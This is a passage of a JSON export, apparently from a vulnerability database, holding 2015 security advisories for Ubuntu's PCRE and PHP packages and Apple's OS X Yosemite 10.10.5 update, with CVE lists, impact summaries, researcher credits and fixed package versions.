instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.04:\r\n libpcre3 2:8.35-3.3ubuntu1.1\r\n\r\nUbuntu 14.04 LTS:\r\n libpcre3 1:8.31-2ubuntu2.1\r\n\r\nUbuntu 12.04 LTS:\r\n libpcre3 8.12-4ubuntu0.1\r\n\r\nAfter a standard system update you need to restart applications using PCRE,\r\nsuch as the Apache HTTP server and Nginx, to make all the necessary\r\nchanges.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2694-1\r\n CVE-2014-8964, CVE-2015-2325, CVE-2015-2326, CVE-2015-3210,\r\n CVE-2015-5073\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/pcre3/2:8.35-3.3ubuntu1.1\r\n https://launchpad.net/ubuntu/+source/pcre3/1:8.31-2ubuntu2.1\r\n https://launchpad.net/ubuntu/+source/pcre3/8.12-4ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-08-02T00:00:00", "title": "[USN-2694-1] PCRE vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:00", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-3210", "CVE-2015-2325", "CVE-2014-8964", "CVE-2015-5073", "CVE-2015-2326"], "modified": "2015-08-02T00:00:00", "id": "SECURITYVULNS:DOC:32379", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32379", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:00", "references": [], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2658-1\r\nJuly 06, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.04\r\n- Ubuntu 14.10\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in PHP.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nNeal Poole and Tomas Hoger discovered that PHP incorrectly handled NULL\r\nbytes in file paths. A remote attacker could possibly use this issue to\r\nbypass intended restrictions and create or obtain access to sensitive\r\nfiles. (CVE-2015-3411, CVE-2015-3412, CVE-2015-4025, CVE-2015-4026,\r\nCVE-2015-4598)\r\n\r\nEmmanuel Law discovered that the PHP phar extension incorrectly handled\r\nfilenames starting with a NULL byte. A remote attacker could use this issue\r\nwith a crafted tar archive to cause a denial of service. (CVE-2015-4021)\r\n\r\nMax Spelsberg discovered that PHP incorrectly handled the LIST command\r\nwhen connecting to remote FTP servers. A malicious FTP server could\r\npossibly use this issue to execute arbitrary code. (CVE-2015-4022,\r\nCVE-2015-4643)\r\n\r\nShusheng Liu discovered that PHP incorrectly handled certain malformed form\r\ndata. A remote attacker could use this issue with crafted form data to\r\ncause CPU consumption, leading to a denial of service. (CVE-2015-4024)\r\n\r\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated\r\ndata types. A remote attacker could use this issue with crafted serialized\r\ndata to possibly execute arbitrary code. (CVE-2015-4147)\r\n\r\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated\r\nthat the uri property is a string. A remote attacker could use this issue\r\nwith crafted serialized data to possibly obtain sensitive information.\r\n(CVE-2015-4148)\r\n\r\nTaoguang Chen discovered that PHP incorrectly validated data types in\r\nmultiple locations. A remote attacker could possibly use these issues to\r\nobtain sensitive information or cause a denial of service. (CVE-2015-4599,\r\nCVE-2015-4600, CVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\r\n\r\nIt was discovered that the PHP Fileinfo component incorrectly handled\r\ncertain files. A remote attacker could use this issue to cause PHP to\r\ncrash, resulting in a denial of service. This issue only affected Ubuntu\r\n15.04. (CVE-2015-4604, CVE-2015-4605)\r\n\r\nIt was discovered that PHP incorrectly handled table names in\r\nphp_pgsql_meta_data. A local attacker could possibly use this issue to\r\ncause PHP to crash, resulting in a denial of service. (CVE-2015-4644)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.2\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.2\r\n php5-cli 5.6.4+dfsg-4ubuntu6.2\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.2\r\n\r\nUbuntu 14.10:\r\n libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.6\r\n php5-cgi 5.5.12+dfsg-2ubuntu4.6\r\n php5-cli 5.5.12+dfsg-2ubuntu4.6\r\n php5-fpm 5.5.12+dfsg-2ubuntu4.6\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.11\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.11\r\n php5-cli 5.5.9+dfsg-1ubuntu4.11\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.11\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.19\r\n php5-cgi 5.3.10-1ubuntu3.19\r\n php5-cli 5.3.10-1ubuntu3.19\r\n php5-fpm 5.3.10-1ubuntu3.19\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2658-1\r\n CVE-2015-3411, CVE-2015-3412, CVE-2015-4021, CVE-2015-4022,\r\n CVE-2015-4024, CVE-2015-4025, CVE-2015-4026, CVE-2015-4147,\r\n CVE-2015-4148, CVE-2015-4598, CVE-2015-4599, CVE-2015-4600,\r\n CVE-2015-4601, CVE-2015-4602, CVE-2015-4603, CVE-2015-4604,\r\n CVE-2015-4605, CVE-2015-4643, CVE-2015-4644\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.2\r\n https://launchpad.net/ubuntu/+source/php5/5.5.12+dfsg-2ubuntu4.6\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.11\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.19\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-07-13T00:00:00", "title": "[USN-2658-1] PHP vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:11:00", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-4601", "CVE-2015-4644", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643"], "modified": "2015-07-13T00:00:00", "id": "SECURITYVULNS:DOC:32315", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32315", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32315"], "description": "Code execution, DoS conditions, poisoned NULL byte vulnereability, information disclosure.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-07-13T00:00:00", "title": "PHP multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:01", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PHP", "version": "5.6", "operator": "eq"}], "cvelist": ["CVE-2015-4601", "CVE-2015-4027", "CVE-2015-4644", "CVE-2015-4605", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4028", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643"], "modified": "2015-07-13T00:00:00", "id": "SECURITYVULNS:VULN:14580", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14580", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32391", "https://vulners.com/securityvulns/securityvulns:doc:32390"], "description": "Over 150 different vulnerabilities in system components and libraries.", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-08-17T00:00:00", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:01", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "MacOS X", "version": "10.10", "operator": "eq"}, {"name": "MacOS X Server", "version": "4.1", "operator": "eq"}], "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-5477", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "modified": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "references": [], "description": "\r\n\r\nAPPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update\r\n2015-006\r\n\r\nOS X Yosemite v10.10.5 and Security Update 2015-006 is now available\r\nand addresses the following:\r\n\r\napache\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in Apache 2.4.16, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in Apache versions\r\nprior to 2.4.16. These were addressed by updating Apache to version\r\n2.4.16.\r\nCVE-ID\r\nCVE-2014-3581\r\nCVE-2014-3583\r\nCVE-2014-8109\r\nCVE-2015-0228\r\nCVE-2015-0253\r\nCVE-2015-3183\r\nCVE-2015-3185\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in PHP 5.5.20, the most\r\nserious of which may lead to arbitrary code execution.\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.20. These were addressed by updating Apache to version 5.5.27.\r\nCVE-ID\r\nCVE-2015-2783\r\nCVE-2015-2787\r\nCVE-2015-3307\r\nCVE-2015-3329\r\nCVE-2015-3330\r\nCVE-2015-4021\r\nCVE-2015-4022\r\nCVE-2015-4024\r\nCVE-2015-4025\r\nCVE-2015-4026\r\nCVE-2015-4147\r\nCVE-2015-4148\r\n\r\nApple ID OD Plug-in\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able change the password of a\r\nlocal user\r\nDescription: In some circumstances, a state management issue existed\r\nin password authentication. The issue was addressed through improved\r\nstate management.\r\nCVE-ID\r\nCVE-2015-3799 : an anonymous researcher working with HP's Zero Day\r\nInitiative\r\n\r\nAppleGraphicsControl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in AppleGraphicsControl which could\r\nhave led to the disclosure of kernel memory layout. This issue was\r\naddressed through improved bounds checking.\r\nCVE-ID\r\nCVE-2015-5768 : JieTao Yang of KeenTeam\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in\r\nIOBluetoothHCIController. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3779 : Teddy Reed of Facebook Security\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: A memory management issue could have led to the\r\ndisclosure of kernel memory layout. This issue was addressed with\r\nimproved memory management.\r\nCVE-ID\r\nCVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze\r\nNetworks\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious app may be able to access notifications from\r\nother iCloud devices\r\nDescription: An issue existed where a malicious app could access a\r\nBluetooth-paired Mac or iOS device's Notification Center\r\nnotifications via the Apple Notification Center Service. The issue\r\naffected devices using Handoff and logged into the same iCloud\r\naccount. This issue was resolved by revoking access to the Apple\r\nNotification Center Service.\r\nCVE-ID\r\nCVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security\r\nLab (Indiana University), Tongxin Li (Peking University), XiaoFeng\r\nWang (Indiana University)\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with privileged network position may be able to\r\nperform denial of service attack using malformed Bluetooth packets\r\nDescription: An input validation issue existed in parsing of\r\nBluetooth ACL packets. This issue was addressed through improved\r\ninput validation.\r\nCVE-ID\r\nCVE-2015-3787 : Trend Micro\r\n\r\nBluetooth\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local attacker may be able to cause unexpected application\r\ntermination or arbitrary code execution\r\nDescription: Multiple buffer overflow issues existed in blued's\r\nhandling of XPC messages. These issues were addressed through\r\nimproved bounds checking.\r\nCVE-ID\r\nCVE-2015-3777 : mitp0sh of [PDX]\r\n\r\nbootp\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford (on the EPSRC Being There project)\r\n\r\nCloudKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCoreMedia Playback\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in CoreMedia Playback.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ncurl\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities in cURL and libcurl prior to\r\n7.38.0, one of which may allow remote attackers to bypass the Same\r\nOrigin Policy.\r\nDescription: Multiple vulnerabilities existed in cURL and libcurl\r\nprior to 7.38.0. These issues were addressed by updating cURL to\r\nversion 7.43.0.\r\nCVE-ID\r\nCVE-2014-3613\r\nCVE-2014-3620\r\nCVE-2014-3707\r\nCVE-2014-8150\r\nCVE-2014-8151\r\nCVE-2015-3143\r\nCVE-2015-3144\r\nCVE-2015-3145\r\nCVE-2015-3148\r\nCVE-2015-3153\r\n\r\nData Detectors Engine\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a sequence of unicode characters can lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in processing of\r\nUnicode characters. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)\r\n\r\nDate & Time pref pane\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Applications that rely on system time may have unexpected\r\nbehavior\r\nDescription: An authorization issue existed when modifying the\r\nsystem date and time preferences. This issue was addressed with\r\nadditional authorization checks.\r\nCVE-ID\r\nCVE-2015-3757 : Mark S C Smith\r\n\r\nDictionary Application\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: An attacker with a privileged network position may be able\r\nto intercept users' Dictionary app queries\r\nDescription: An issue existed in the Dictionary app, which did not\r\nproperly secure user communications. This issue was addressed by\r\nmoving Dictionary queries to HTTPS.\r\nCVE-ID\r\nCVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security\r\nTeam\r\n\r\nDiskImages\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\ndyld\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed in dyld. This was\r\naddressed through improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3760 : beist of grayhash, Stefan Esser\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5775 : Apple\r\n\r\nFontParser\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\ngroff\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple issues in pdfroff\r\nDescription: Multiple issues existed in pdfroff, the most serious of\r\nwhich may allow arbitrary filesystem modification. These issues were\r\naddressed by removing pdfroff.\r\nCVE-ID\r\nCVE-2009-5044\r\nCVE-2009-5078\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted TIFF image may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nTIFF images. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of PNG and TIFF images. Visiting a malicious\r\nwebsite may result in sending data from process memory to the\r\nwebsite. This issue is addressed through improved memory\r\ninitialization and additional validation of PNG and TIFF images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with root privileges\r\nDescription: An issue existed in how Install.framework's 'runner'\r\nbinary dropped privileges. This issue was addressed through improved\r\nprivilege management.\r\nCVE-ID\r\nCVE-2015-5784 : Ian Beer of Google Project Zero\r\n\r\nInstall Framework Legacy\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A race condition existed in\r\nInstall.framework's 'runner' binary that resulted in\r\nprivileges being incorrectly dropped. This issue was addressed\r\nthrough improved object locking.\r\nCVE-ID\r\nCVE-2015-5754 : Ian Beer of Google Project Zero\r\n\r\nIOFireWireFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: Memory corruption issues existed in IOFireWireFamily.\r\nThese issues were addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3769 : Ilja van Sprundel\r\nCVE-2015-3771 : Ilja van Sprundel\r\nCVE-2015-3772 : Ilja van Sprundel\r\n\r\nIOGraphics\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in IOGraphics. This\r\nissue was addressed through additional type input validation.\r\nCVE-ID\r\nCVE-2015-3770 : Ilja van Sprundel\r\nCVE-2015-5783 : Ilja van Sprundel\r\n\r\nIOHIDFamily\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A resource exhaustion issue existed in the fasttrap\r\ndriver. This was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5747 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to cause a system denial of service\r\nDescription: A validation issue existed in the mounting of HFS\r\nvolumes. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-5748 : Maxime VILLARD of m00nbsd\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A specially crafted executable file could allow unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n(@jollyjinx) of Jinx Germany\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A path validation issue existed. This was addressed\r\nthrough improved environment sanitization.\r\nCVE-ID\r\nCVE-2015-3761 : Apple\r\n\r\nLibc\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in the TRE library.\r\nThese were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: Memory corruption issues existed in handling AF_INET6\r\nsockets. These were addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling 